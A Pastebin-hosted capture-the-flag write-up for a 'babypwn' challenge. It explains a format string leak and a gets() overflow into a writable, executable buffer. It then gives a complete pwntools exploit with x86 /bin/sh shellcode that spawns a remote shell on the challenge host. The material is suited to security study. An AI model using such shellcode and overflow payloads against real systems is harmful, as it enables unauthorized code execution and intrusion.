API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2018
1,148
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
raw download clone embed print report
  1. First we have just a URL and a port with no binary,the binary has 3 options: StrLen, which takes a string and then returns the length(obviously); SubStrRemove, which its not implemented; and finally StrRemoveLastSymbols, which takes a string then a number(call it n) and removes the last n characters from your string.
  2.  
  3. StrRemoveLastSymbols has a format string vulnerability which I used to dump important parts of the binary(like ESPR in the 33c3 ctf https://www.youtube.com#/watch?v=XuzuFUGuQv0).
  4.  
  5. If you open the dumped binary, first it doesn't have sections, so its not executable, but you can see the disassembly. In the main function there is a switch which checks for '1','2','3','T','X' and 'S', the first three options are already mentioned above, but there are three secret options here(T,X and S): S prints 'It's strange' and then segfaults, X asks you 'Are you surprised?? (y or n)' and then prints some text depending in your answer,finally T asks you the same as X but if you answer 'y' it will print a link to download the binary and the libc of it, Now you can download them and make the exploit.
  6.  
  7. But Where its the vulnerability?,even as do we have a format string there is another vulnerability easier to exploit. Remember the 'Are you surprised?? (y or n)', well its not a getchr, its a gets with a buffer located in the .text section. You now what that means?, that .text section is rwx, so we can just overwrite something important above the buffer to redirect code execution to the same buffer using shellcode, so I tested with pattern_create in peda and using the 'X' option in the binary, it segfaults at offset 256, but it has to contain a 'y' character, so this is my exploit:
  8.  
  9. #!/usr/bin/env python2
  10. from pwn import *
  11. def recvlines(lnum):
  12. global p
  13. res=""
  14. for x in range(lnum):
  15. res+=p.recvline()
  16. return res
  17.  
  18. host="pwn-03.v7frkwrfyhsjtbpfcppnu.ctfz.one"
  19. port=1234
  20.  
  21. base_buf=0x80492e0
  22. shellcode="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
  23. payload=("y"+shellcode).ljust(256,"\x90")+p32(base_buf+1)
  24. p=remote(host,port)
  25. #p=process("./babypwn")
  26. print recvlines(4)
  27. p.sendline("X")
  28. print recvlines(3)
  29. p.sendline(payload)
  30. p.interactive()
  31.  
  32.  
  33. now after geting a shell we just have to cat the flag
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!